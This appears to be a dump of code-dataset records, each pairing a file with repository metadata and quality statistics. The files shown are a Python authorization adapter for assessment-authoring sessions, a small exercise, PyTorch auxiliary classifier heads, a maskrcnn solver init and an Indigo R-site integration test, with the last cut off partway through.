        return self._can('update') or bool(self._get_overriding_catalog_ids('update'))

    @raise_null_argument
    def get_sequence_rule_enabler_form_for_update(self, sequence_rule_enabler_id):
        """Return an update form if 'update' is authorized for this enabler."""
        if self._can_for_sequence_rule_enabler('update', sequence_rule_enabler_id):
            return self._provider_session.get_sequence_rule_enabler_form_for_update(sequence_rule_enabler_id)
        raise PermissionDenied()

    def duplicate_sequence_rule_enabler(self, sequence_rule_enabler_id):
        """Duplicate an enabler if 'update' is authorized."""
        if self._can('update'):
            return self._provider_session.duplicate_sequence_rule_enabler(sequence_rule_enabler_id)
        raise PermissionDenied()

    @raise_null_argument
    def update_sequence_rule_enabler(self, sequence_rule_enabler_form):
        """Update an enabler if 'update' is authorized."""
        if self._can('update'):
            return self._provider_session.update_sequence_rule_enabler(sequence_rule_enabler_form)
        raise PermissionDenied()

    def can_delete_sequence_rule_enablers(self):
        """True when delete is authorized here or in an overriding catalog."""
        return self._can('delete') or bool(self._get_overriding_catalog_ids('delete'))

    @raise_null_argument
    def delete_sequence_rule_enabler(self, sequence_rule_enabler_id):
        """Delete an enabler if 'delete' is authorized for it."""
        if self._can_for_sequence_rule_enabler('delete', sequence_rule_enabler_id):
            return self._provider_session.delete_sequence_rule_enabler(sequence_rule_enabler_id)
        raise PermissionDenied()

    def can_manage_sequence_rule_enabler_aliases(self):
        """True when alias management is authorized here or via overrides."""
        return self._can('manage') or bool(self._get_overriding_catalog_ids('manage'))

    @raise_null_argument
    def alias_sequence_rule_enabler(self, sequence_rule_enabler_id, alias_id):
        """Alias an enabler if 'alias' is authorized for it."""
        if self._can_for_sequence_rule_enabler('alias', sequence_rule_enabler_id):
            return self._provider_session.alias_sequence_rule_enabler(sequence_rule_enabler_id, alias_id)
        raise PermissionDenied()
class SequenceRuleEnablerNotificationSession(abc_assessment_authoring_sessions.SequenceRuleEnablerNotificationSession, osid_sessions.OsidSession):
    """Authorization wrapper around the provider's SequenceRuleEnablerNotificationSession.

    Registration calls are gated on 'register' authorization before
    delegating to the provider session.

    Fix: the original defined ``reliable_sequence_rule_enabler_notifications``,
    ``unreliable_sequence_rule_enabler_notifications`` and
    ``acknowledge_sequence_rule_enabler_notification`` twice with identical
    bodies; the redundant later definitions (which silently shadowed the
    earlier ones) have been removed.
    """

    def get_bank_id(self):
        """Return the bank Id; Ids are not permission-gated."""
        return self._provider_session.get_bank_id()

    bank_id = property(fget=get_bank_id)

    def get_bank(self):
        """Return the bank if the caller holds 'lookup' authorization."""
        if not self._can('lookup'):
            raise PermissionDenied()
        return self._provider_session.get_bank()

    bank = property(fget=get_bank)

    def can_register_for_sequence_rule_enabler_notifications(self):
        """True when the caller holds 'register' authorization."""
        return self._can('register')

    def use_federated_bank_view(self):
        """Propagate the federated view to the provider and any query session."""
        self._use_federated_catalog_view()
        self._provider_session.use_federated_bank_view()
        if self._query_session:
            self._query_session.use_federated_bank_view()

    def use_isolated_bank_view(self):
        """Propagate the isolated view to the provider and any query session."""
        self._use_isolated_catalog_view()
        self._provider_session.use_isolated_bank_view()
        if self._query_session:
            self._query_session.use_isolated_bank_view()

    def reliable_sequence_rule_enabler_notifications(self):
        """Pass the reliable-notification switch through to the provider."""
        self._provider_session.reliable_sequence_rule_enabler_notifications()

    def unreliable_sequence_rule_enabler_notifications(self):
        """Pass the unreliable-notification switch through to the provider."""
        self._provider_session.unreliable_sequence_rule_enabler_notifications()

    @raise_null_argument
    def acknowledge_sequence_rule_enabler_notification(self, notification_id):
        """Not supported by this adapter."""
        raise Unimplemented()

    def register_for_new_sequence_rule_enablers(self):
        """Register for new-enabler notifications if 'register' is authorized."""
        if not self._can('register'):
            raise PermissionDenied()
        self._provider_session.register_for_new_sequence_rule_enablers()

    def register_for_changed_sequence_rule_enablers(self):
        """Register for changed-enabler notifications if 'register' is authorized."""
        if not self._can('register'):
            raise PermissionDenied()
        self._provider_session.register_for_changed_sequence_rule_enablers()

    @raise_null_argument
    def register_for_changed_sequence_rule_enabler(self, sequence_rule_enabler_id):
        """Register for changes to one enabler if 'register' is authorized."""
        if not self._can('register'):
            raise PermissionDenied()
        self._provider_session.register_for_changed_sequence_rule_enabler(sequence_rule_enabler_id)

    def register_for_deleted_sequence_rule_enablers(self):
        """Register for deleted-enabler notifications if 'register' is authorized."""
        if not self._can('register'):
            raise PermissionDenied()
        self._provider_session.register_for_deleted_sequence_rule_enablers()

    @raise_null_argument
    def register_for_deleted_sequence_rule_enabler(self, sequence_rule_enabler_id):
        """Register for deletion of one enabler if 'register' is authorized."""
        if not self._can('register'):
            raise PermissionDenied()
        self._provider_session.register_for_deleted_sequence_rule_enabler(sequence_rule_enabler_id)
class SequenceRuleEnablerBankSession(abc_assessment_authoring_sessions.SequenceRuleEnablerBankSession, osid_sessions.OsidSession):
    """Authorization wrapper around the provider's SequenceRuleEnablerBankSession."""

    def can_lookup_sequence_rule_enabler_bank_mappings(self):
        """True when the caller holds 'lookup' authorization."""
        return self._can('lookup')

    def use_comparative_sequence_rule_enabler_bank_view(self):
        """Pass the comparative-view switch through to the provider."""
        self._provider_session.use_comparative_sequence_rule_enabler_bank_view()

    def use_plenary_sequence_rule_enabler_bank_view(self):
        """Pass the plenary-view switch through to the provider."""
        self._provider_session.use_plenary_sequence_rule_enabler_bank_view()

    @raise_null_argument
    def get_sequence_rule_enabler_ids_by_bank(self, bank_id):
        """Return enabler Ids in a bank if 'lookup' is authorized."""
        if self._can('lookup'):
            return self._provider_session.get_sequence_rule_enabler_ids_by_bank(bank_id)
        raise PermissionDenied()

    @raise_null_argument
    def get_sequence_rule_enablers_by_bank(self, bank_id):
        """Return enablers in a bank if 'lookup' is authorized."""
        if self._can('lookup'):
            return self._provider_session.get_sequence_rule_enablers_by_bank(bank_id)
        raise PermissionDenied()

    @raise_null_argument
    def get_sequence_rule_enabler_ids_by_banks(self, bank_ids):
        """Return enabler Ids across several banks if 'lookup' is authorized."""
        if self._can('lookup'):
            return self._provider_session.get_sequence_rule_enabler_ids_by_banks(bank_ids)
        raise PermissionDenied()

    @raise_null_argument
    def get_sequence_rule_enablers_by_banks(self, bank_ids):
        """Return enablers across several banks if 'lookup' is authorized."""
        if self._can('lookup'):
            return self._provider_session.get_sequence_rule_enablers_by_banks(bank_ids)
        raise PermissionDenied()

    @raise_null_argument
    def get_bank_ids_by_sequence_rule_enabler(self, sequence_rule_enabler_id):
        """Return bank Ids mapped to an enabler if 'lookup' is authorized."""
        if self._can('lookup'):
            return self._provider_session.get_bank_ids_by_sequence_rule_enabler(sequence_rule_enabler_id)
        raise PermissionDenied()

    @raise_null_argument
    def get_banks_by_sequence_rule_enabler(self, sequence_rule_enabler_id):
        """Return banks mapped to an enabler if 'lookup' is authorized."""
        if self._can('lookup'):
            return self._provider_session.get_banks_by_sequence_rule_enabler(sequence_rule_enabler_id)
        raise PermissionDenied()
class SequenceRuleEnablerBankAssignmentSession(abc_assessment_authoring_sessions.SequenceRuleEnablerBankAssignmentSession, osid_sessions.OsidSession):
    """Authorization wrapper around the provider's SequenceRuleEnablerBankAssignmentSession."""

    def can_assign_sequence_rule_enablers(self):
        """True when the caller holds 'assign' authorization."""
        return self._can('assign')

    @raise_null_argument
    def can_assign_sequence_rule_enablers_to_bank(self, bank_id):
        """True when 'assign' is authorized against the given bank qualifier."""
        return self._can('assign', qualifier_id=bank_id)

    @raise_null_argument
    def get_assignable_bank_ids(self, bank_id):
        """Return assignable bank Ids if 'assign' is authorized."""
        if self._can('assign'):
            return self._provider_session.get_assignable_bank_ids(bank_id)
        raise PermissionDenied()

    @raise_null_argument
    def get_assignable_bank_ids_for_sequence_rule_enabler(self, bank_id, sequence_rule_enabler_id):
        """Return assignable bank Ids for an enabler if 'assign' is authorized."""
        if self._can('assign'):
            return self._provider_session.get_assignable_bank_ids_for_sequence_rule_enabler(bank_id, sequence_rule_enabler_id)
        raise PermissionDenied()

    @raise_null_argument
    def assign_sequence_rule_enabler_to_bank(self, sequence_rule_enabler_id, bank_id):
        """Map an enabler to a bank if 'assign' is authorized."""
        if self._can('assign'):
            return self._provider_session.assign_sequence_rule_enabler_to_bank(sequence_rule_enabler_id, bank_id)
        raise PermissionDenied()

    @raise_null_argument
    def unassign_sequence_rule_enabler_from_bank(self, sequence_rule_enabler_id, bank_id):
        """Remove an enabler-to-bank mapping if 'assign' is authorized."""
        if self._can('assign'):
            return self._provider_session.unassign_sequence_rule_enabler_from_bank(sequence_rule_enabler_id, bank_id)
        raise PermissionDenied()
class SequenceRuleEnablerSmartBankSession(abc_assessment_authoring_sessions.SequenceRuleEnablerSmartBankSession, osid_sessions.OsidSession):
    """Authorization wrapper around the provider's SequenceRuleEnablerSmartBankSession.

    Smart-bank management is not yet implemented; only the bank accessors work.
    """

    def get_bank_id(self):
        """Return the bank Id; Ids are not permission-gated."""
        return self._provider_session.get_bank_id()

    bank_id = property(fget=get_bank_id)

    def get_bank(self):
        """Return the bank if the caller holds 'lookup' authorization."""
        if self._can('lookup'):
            return self._provider_session.get_bank()
        raise PermissionDenied()

    bank = property(fget=get_bank)

    def can_manage_smart_banks(self):
        """Not supported by this adapter."""
        raise Unimplemented()

    def get_sequence_rule_enabler_query(self):
        """Not supported by this adapter."""
        raise Unimplemented()

    sequence_rule_enabler_query = property(fget=get_sequence_rule_enabler_query)

    def get_sequence_rule_enabler_search_order(self):
        """Not supported by this adapter."""
        raise Unimplemented()

    sequence_rule_enabler_search_order = property(fget=get_sequence_rule_enabler_search_order)

    @raise_null_argument
    def apply_sequence_rule_enabler_query(self, sequence_rule_enabler_query):
        """Not supported by this adapter."""
        raise Unimplemented()

    def inspect_sequence_rule_enabler_query(self):
        """Not supported by this adapter."""
        raise Unimplemented()

    @raise_null_argument
    def apply_sequence_rule_enabler_sequencing(self, sequence_rule_enabler_search_order):
        """Not supported by this adapter."""
        raise Unimplemented()

    @raise_null_argument
    def get_sequence_rule_enabler_query_from_inspector(self, sequence_rule_enabler_query_inspector):
        """Not supported by this adapter."""
        raise Unimplemented()
class SequenceRuleEnablerRuleLookupSession(abc_assessment_authoring_sessions.SequenceRuleEnablerRuleLookupSession, osid_sessions.OsidSession):
    """Authorization wrapper around the provider's SequenceRuleEnablerRuleLookupSession."""

    def get_bank_id(self):
        """Return the bank Id; Ids are not permission-gated."""
        return self._provider_session.get_bank_id()

    bank_id = property(fget=get_bank_id)

    def get_bank(self):
        """Return the bank if the caller holds 'lookup' authorization."""
        if self._can('lookup'):
            return self._provider_session.get_bank()
        raise PermissionDenied()

    bank = property(fget=get_bank)

    def can_lookup_sequence_rule_enabler_rules(self):
        """True when lookup is authorized here or in an overriding catalog."""
        return self._can('lookup') or bool(self._get_overriding_catalog_ids('lookup'))

    def use_comparative_sequence_rule_enabler_rule_view(self):
        """Switch this wrapper and the provider to the comparative view."""
        self._use_comparative_object_view()
        self._provider_session.use_comparative_sequence_rule_enabler_rule_view()

    def use_plenary_sequence_rule_enabler_rule_view(self):
        """Switch this wrapper and the provider to the plenary view."""
        self._use_plenary_object_view()
        self._provider_session.use_plenary_sequence_rule_enabler_rule_view()

    def use_federated_bank_view(self):
        """Propagate the federated view to the provider and any query session."""
        self._use_federated_catalog_view()
        self._provider_session.use_federated_bank_view()
        if self._query_session:
            self._query_session.use_federated_bank_view()

    def use_isolated_bank_view(self):
        """Propagate the isolated view to the provider and any query session."""
        self._use_isolated_catalog_view()
        self._provider_session.use_isolated_bank_view()
        if self._query_session:
            self._query_session.use_isolated_bank_view()

    @raise_null_argument
    def get_sequence_rule_enabler_ids_for_sequence_rule(self, sequence_rule_id):
        """Not supported by this adapter."""
        raise Unimplemented()

    @raise_null_argument
    def get_sequence_rule_enablers_for_sequence_rule(self, sequence_rule_id):
        """Fetch enablers for a sequence rule, falling back to a query."""
        if self._can('lookup'):
            return self._provider_session.get_sequence_rule_enablers_for_sequence_rule(sequence_rule_id)
        self._check_lookup_conditions()  # raises PermissionDenied
        # NOTE(review): this uses a *rule* query accessor unlike the sibling
        # lookup sessions — confirm the query session provides it.
        rule_query = self._query_session.get_sequence_rule_enabler_rule_query()
        rule_query.match_sequence_rule_id(sequence_rule_id, match=True)
        return self._try_harder(rule_query)

    @raise_null_argument
    def get_sequence_rule_ids_for_sequence_rule_enabler(self, sequence_rule_enabler_id):
        """Not supported by this adapter."""
        raise Unimplemented()

    @raise_null_argument
    def get_sequence_rules_for_sequence_rule_enabler(self, sequence_rule_enabler_id):
        """Not supported by this adapter."""
        raise Unimplemented()
class SequenceRuleEnablerRuleApplicationSession(abc_assessment_authoring_sessions.SequenceRuleEnablerRuleApplicationSession, osid_sessions.OsidSession):
    """Authorization wrapper around the provider's SequenceRuleEnablerRuleApplicationSession.

    Rule application and sequencing are not yet implemented; only the bank
    accessors work.
    """

    def get_bank_id(self):
        """Return the bank Id; Ids are not permission-gated."""
        return self._provider_session.get_bank_id()

    bank_id = property(fget=get_bank_id)

    def get_bank(self):
        """Return the bank if the caller holds 'lookup' authorization."""
        if self._can('lookup'):
            return self._provider_session.get_bank()
        raise PermissionDenied()

    bank = property(fget=get_bank)

    def can_assign_sequence_rule_enablers(self):
        """Not supported by this adapter."""
        raise Unimplemented()

    @raise_null_argument
    def assign_sequence_rule_enabler_to_sequence_rule(self, sequence_rule_enabler_id, sequence_rule_id):
        """Not supported by this adapter."""
        raise Unimplemented()

    @raise_null_argument
    def unassign_sequence_rule_enabler_from_sequence_rule(self, sequence_rule_enabler_id, sequence_rule_id):
        """Not supported by this adapter."""
        raise Unimplemented()

    def can_sequence_sequence_rule_enablers(self):
        """Not supported by this adapter."""
        raise Unimplemented()

    @raise_null_argument
    def move_sequence_rule_enabler_ahead(self, sequence_rule_enabler_id, sequence_rule_id, reference_id):
        """Not supported by this adapter."""
        raise Unimplemented()

    @raise_null_argument
    def move_sequence_rule_enabler_behind(self, sequence_rule_enabler_id, sequence_rule_id, reference_id):
        """Not supported by this adapter."""
        raise Unimplemented()

    @raise_null_argument
    def order_sequence_rule_enablers(self, sequence_rule_enabler_ids, sequence_rule_id):
        """Not supported by this adapter."""
        raise Unimplemented()
| 46.025088
| 152
| 0.742424
| 13,635
| 117,410
| 5.926073
| 0.020462
| 0.061632
| 0.061075
| 0.084342
| 0.932353
| 0.904594
| 0.882082
| 0.862083
| 0.843766
| 0.821935
| 0
| 0.000126
| 0.191977
| 117,410
| 2,550
| 153
| 46.043137
| 0.851586
| 0.254433
| 0
| 0.720841
| 0
| 0
| 0.025771
| 0.009078
| 0
| 0
| 0
| 0
| 0
| 1
| 0.213512
| false
| 0.002549
| 0.005099
| 0.039516
| 0.424474
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
44688f326f03a1557c6029f29e4ffe38f721a4fb
| 59
|
py
|
Python
|
CursoIntensivoPython/curso-intensivo-python-master/capitulo_02/exercicios/numero_oito.py
|
SweydAbdul/estudos-python
|
b052708d0566a0afb9a1c04d035467d45f820879
|
[
"MIT"
] | null | null | null |
CursoIntensivoPython/curso-intensivo-python-master/capitulo_02/exercicios/numero_oito.py
|
SweydAbdul/estudos-python
|
b052708d0566a0afb9a1c04d035467d45f820879
|
[
"MIT"
] | null | null | null |
CursoIntensivoPython/curso-intensivo-python-master/capitulo_02/exercicios/numero_oito.py
|
SweydAbdul/estudos-python
|
b052708d0566a0afb9a1c04d035467d45f820879
|
[
"MIT"
] | null | null | null |
# Exercise: four arithmetic expressions (add, subtract, multiply, divide)
# that each evaluate to 8, printed one per line.
for eight in (4 + 4, 10 - 2, 2 * 4, int(64 / 8)):
    print(eight)
| 11.8
| 18
| 0.559322
| 13
| 59
| 2.538462
| 0.538462
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.212766
| 0.20339
| 59
| 4
| 19
| 14.75
| 0.489362
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
446c7c17f1c29aeeaa987911b491b3618328c1c4
| 130
|
py
|
Python
|
stable_baselines/sqn/__init__.py
|
createamind/stable-baselines
|
663f2cd71560c53ebe01e41e560386dd9568f50f
|
[
"MIT"
] | 1
|
2020-10-20T06:13:15.000Z
|
2020-10-20T06:13:15.000Z
|
stable_baselines/sqn/__init__.py
|
createamind/stable-baselines
|
663f2cd71560c53ebe01e41e560386dd9568f50f
|
[
"MIT"
] | null | null | null |
stable_baselines/sqn/__init__.py
|
createamind/stable-baselines
|
663f2cd71560c53ebe01e41e560386dd9568f50f
|
[
"MIT"
] | null | null | null |
from stable_baselines.sqn.sqn import SQN
from stable_baselines.sqn.policies import MlpPolicy, CnnPolicy, LnMlpPolicy, LnCnnPolicy
| 43.333333
| 88
| 0.861538
| 17
| 130
| 6.470588
| 0.588235
| 0.181818
| 0.345455
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084615
| 130
| 2
| 89
| 65
| 0.92437
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
447e8a8607f28d02f40d426eb5d6aaf8a15c1905
| 2,527
|
py
|
Python
|
extorch/nn/modules/auxiliary.py
|
A-LinCui/Extorch
|
70e2100636c68c803a1e763fbf11d8ede73c0d37
|
[
"MIT"
] | 2
|
2021-09-11T16:09:05.000Z
|
2022-03-05T08:02:05.000Z
|
extorch/nn/modules/auxiliary.py
|
A-LinCui/Extorch
|
70e2100636c68c803a1e763fbf11d8ede73c0d37
|
[
"MIT"
] | null | null | null |
extorch/nn/modules/auxiliary.py
|
A-LinCui/Extorch
|
70e2100636c68c803a1e763fbf11d8ede73c0d37
|
[
"MIT"
] | null | null | null |
from torch import Tensor
import torch.nn as nn
class AuxiliaryHead(nn.Module):
    r"""
    Auxiliary classification head for CIFAR-sized (32x32) feature maps.

    Args:
        in_channels (int): Number of channels in the input feature.
        num_classes (int): Number of classes.

    Examples::
        >>> import torch
        >>> input = torch.randn((10, 3, 32, 32))
        >>> module = AuxiliaryHead(3, 10)
        >>> output = module(input)
    """

    def __init__(self, in_channels: int, num_classes: int) -> None:
        super(AuxiliaryHead, self).__init__()
        # Downsample, project to 128, expand to 768, then global-pool to 1x1.
        trunk = [
            nn.ReLU(inplace=True),
            nn.AvgPool2d(5, stride=3, padding=0, count_include_pad=False),
            nn.Conv2d(in_channels, 128, 1, bias=False),
            nn.BatchNorm2d(128),
            nn.ReLU(inplace=True),
            nn.Conv2d(128, 768, 2, bias=False),
            nn.BatchNorm2d(768),
            nn.ReLU(inplace=True),
            nn.AdaptiveAvgPool2d((1, 1)),
        ]
        self.features = nn.Sequential(*trunk)
        self.classifier = nn.Linear(768, num_classes)

    def forward(self, input: Tensor) -> Tensor:  # pylint: disable=arguments-differ
        pooled = self.features(input)
        flattened = pooled.view(pooled.size(0), -1)
        return self.classifier(flattened)
class AuxiliaryHeadImageNet(nn.Module):
    r"""
    Auxiliary classification head for ImageNet-style feature maps.

    Identical trunk to :class:`AuxiliaryHead` except the average pool uses
    stride 2 (larger spatial inputs), followed by a linear classifier.

    Args:
        in_channels (int): Number of channels in the input feature.
        num_classes (int): Number of classes.

    Examples::
        >>> import torch
        >>> input = torch.randn(10, 5, 32, 32)
        >>> module = AuxiliaryHeadImageNet(5, 10)
        >>> output = module(input)
    """
    def __init__(self, in_channels: int, num_classes: int) -> None:
        super().__init__()
        trunk = [
            nn.ReLU(inplace=True),
            # stride 2 here (vs. 3 on CIFAR) because ImageNet features are larger
            nn.AvgPool2d(5, stride=2, padding=0, count_include_pad=False),
            nn.Conv2d(in_channels, 128, 1, bias=False),
            nn.BatchNorm2d(128),
            nn.ReLU(inplace=True),
            nn.Conv2d(128, 768, 2, bias=False),
            nn.BatchNorm2d(768),
            nn.ReLU(inplace=True),
            nn.AdaptiveAvgPool2d((1, 1)),
        ]
        self.features = nn.Sequential(*trunk)
        self.classifier = nn.Linear(768, num_classes)

    def forward(self, input: Tensor) -> Tensor:
        feat = self.features(input)
        # collapse the (C, 1, 1) feature map before the linear layer
        logits = self.classifier(feat.flatten(1))
        return logits
| 33.693333
| 81
| 0.58607
| 298
| 2,527
| 4.862416
| 0.251678
| 0.041408
| 0.05383
| 0.070393
| 0.837819
| 0.837819
| 0.837819
| 0.837819
| 0.837819
| 0.837819
| 0
| 0.047991
| 0.290859
| 2,527
| 74
| 82
| 34.148649
| 0.760603
| 0.27226
| 0
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0
| 0.047619
| 0
| 0.238095
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
927668ea6f35aedcff25f779e85a8b8c27a8c797
| 191
|
py
|
Python
|
maskrcnn_benchmark/solver/__init__.py
|
witwitchayakarn/6DVNET
|
f13b35162ad90fa49d777f3a41383e9d34eb4820
|
[
"MIT"
] | 295
|
2021-12-08T02:22:27.000Z
|
2022-03-31T22:27:10.000Z
|
maskrcnn_benchmark/solver/__init__.py
|
witwitchayakarn/6DVNET
|
f13b35162ad90fa49d777f3a41383e9d34eb4820
|
[
"MIT"
] | 25
|
2019-08-23T02:19:00.000Z
|
2022-01-08T11:26:56.000Z
|
fcos/core/solver/__init__.py
|
best-of-acrv/fcos
|
47e5624973b256b8c74ce2c00fca50e62c19c66a
|
[
"BSD-3-Clause"
] | 21
|
2019-08-23T02:21:59.000Z
|
2022-02-13T04:08:26.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
from .build import make_optimizer
from .build import make_lr_scheduler
from .lr_scheduler import WarmupMultiStepLR
| 38.2
| 72
| 0.806283
| 26
| 191
| 5.769231
| 0.692308
| 0.12
| 0.2
| 0.253333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.141361
| 191
| 4
| 73
| 47.75
| 0.914634
| 0.361257
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
92929518fad021d018370af53a9449fbb935ed28
| 7,165
|
py
|
Python
|
api/tests/integration/tests/basic/rsite.py
|
tsingdao-Tp/Indigo
|
b2d73faebb6a450e9b3d34fed553fad4f9d0012f
|
[
"Apache-2.0"
] | 204
|
2015-11-06T21:34:34.000Z
|
2022-03-30T16:17:01.000Z
|
api/tests/integration/tests/basic/rsite.py
|
tsingdao-Tp/Indigo
|
b2d73faebb6a450e9b3d34fed553fad4f9d0012f
|
[
"Apache-2.0"
] | 509
|
2015-11-05T13:54:43.000Z
|
2022-03-30T22:15:30.000Z
|
api/tests/integration/tests/basic/rsite.py
|
tsingdao-Tp/Indigo
|
b2d73faebb6a450e9b3d34fed553fad4f9d0012f
|
[
"Apache-2.0"
] | 89
|
2015-11-17T08:22:54.000Z
|
2022-03-17T04:26:28.000Z
|
import os
import sys
import errno

# Make the shared integration-test helpers importable.
sys.path.append('../../common')
from env_indigo import *

indigo = Indigo()
# Skip the timestamp in saved molfiles so test output is reproducible.
indigo.setOption("molfile-saving-skip-date", "1")
# Create the output directory if needed; tolerate a concurrent-create race.
if not os.path.exists(joinPathPy("out", __file__)):
    try:
        os.makedirs(joinPathPy("out", __file__))
    except OSError as e:
        if e.errno != errno.EEXIST:
            raise
saver = indigo.createFileSaver(joinPathPy("out/rsite.sdf", __file__), "sdf")

# --- Add/modify R-sites (R-group attachment atoms) on a simple chain ---
mol = indigo.loadMolecule("CCNNCN")
mol.addRSite("R")
mol.addRSite("R")
mol.addRSite("R1")
mol.addRSite("")
a3 = mol.addRSite("R3")
print(mol.molfile())
saver.append(mol)
# R-site carrying two group indices at once.
mol.addRSite("R1, R3")
print(mol.molfile())
saver.append(mol)
# Convert an R-site back into a plain nitrogen atom.
a3.resetAtom("N")
print(mol.molfile())
saver.append(mol)
# Turn an existing atom into an R-site.
a0 = mol.getAtom(0)
a0.setRSite("R4")
print(mol.molfile())
saver.append(mol)
a1 = mol.getAtom(1)
a1.resetAtom("O")
print(mol.molfile())
saver.append(mol)
# R-site on a highlighted atom.
a1.setRSite("R4")
a1.highlight()
print(mol.molfile())
saver.append(mol)

# checkRGroups() should become true once an R-site is added.
mol = indigo.loadMolecule("CCNNCN")
print(mol.checkRGroups())
mol.addRSite("R1")
print(mol.checkRGroups())

# Molfile with an attachment point (M APO) counts as having R-groups.
mol = indigo.loadMolecule('''
Ketcher 12091616232D 1 1.00000 0.00000 0
2 1 0 0 0 999 V2000
13.6750 -5.9750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
14.5410 -6.4750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0
M APO 1 2 1
M END
''')
print(mol.checkRGroups())

# MDL multi-CTAB file with an $RGP section but no R-site atom in the root.
mol = indigo.loadMolecule('''$MDL REV 1
$MOL
$HDR
$END HDR
$CTAB
2 1 0 0 0 999 V2000
13.6750 -5.9750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
14.5410 -6.4750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0
M END
$END CTAB
$RGP
1
$CTAB
2 1 0 0 0 999 V2000
13.3500 -9.9750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
14.2160 -10.4750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0
M END
$END CTAB
$END RGP
$END MOL
''')
print(mol.checkRGroups())

# Ring with two R# atoms (R1, R2), each R-group having two alternatives.
mol = indigo.loadMolecule('''$MDL REV 1 0209181741
$MOL
$HDR
Mrv0541 02091817412D
$END HDR
$CTAB
6 6 0 0 0 0 999 V2000
0.0000 0.8250 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
0.7145 0.4125 0.0000 O 0 0 0 0 0 0 0 0 0 0 0 0
0.7145 -0.4125 0.0000 R# 0 0 0 0 0 0 0 0 0 0 0 0
-0.0000 -0.8250 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
-0.7145 -0.4125 0.0000 O 0 0 0 0 0 0 0 0 0 0 0 0
-0.7145 0.4125 0.0000 R# 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
2 3 1 0 0 0 0
3 4 1 0 0 0 0
4 5 1 0 0 0 0
5 6 1 0 0 0 0
1 6 1 0 0 0 0
M LOG 1 1 0 0
M LOG 1 2 0 0
M RGP 2 3 2 6 1
M END
$END CTAB
$RGP
1
$CTAB
1 0 0 0 0 0 999 V2000
3.8966 -2.4750 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
M END
$END CTAB
$CTAB
1 0 0 0 0 0 999 V2000
6.2538 -2.4750 0.0000 N 0 0 0 0 0 0 0 0 0 0 0 0
M END
$END CTAB
$END RGP
$RGP
2
$CTAB
1 0 0 0 0 0 999 V2000
3.8966 -4.9500 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
M END
$END CTAB
$CTAB
1 0 0 0 0 0 999 V2000
6.2538 -4.9500 0.0000 N 0 0 0 0 0 0 0 0 0 0 0 0
M END
$END CTAB
$END RGP
$END MOL
''')
print(mol.molfile())
print(mol.smiles())

# R-groups with an occurrence/logic line (M LOG ... 0,1) on R2.
mol = indigo.loadMolecule('''$MDL REV 1
$MOL
$HDR
$END HDR
$CTAB
8 8 0 0 0 999 V2000
0.1786 1.3406 0.0000 R# 0 0 0 0 0 0 0 0 0 0 0 0
0.1786 0.5156 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
0.8931 0.1031 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
0.8931 -0.7219 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
0.1786 -1.1344 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
-0.5359 -0.7219 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
-0.5359 0.1031 0.0000 C 0 0 0 0 0 0 0 0 0 0 0 0
-1.2503 0.5156 0.0000 R# 0 0 0 0 0 0 0 0 0 0 0 0
1 2 1 0 0 0 0
2 3 1 0 0 0 0
3 4 1 0 0 0 0
4 5 1 0 0 0 0
5 6 1 0 0 0 0
6 7 1 0 0 0 0
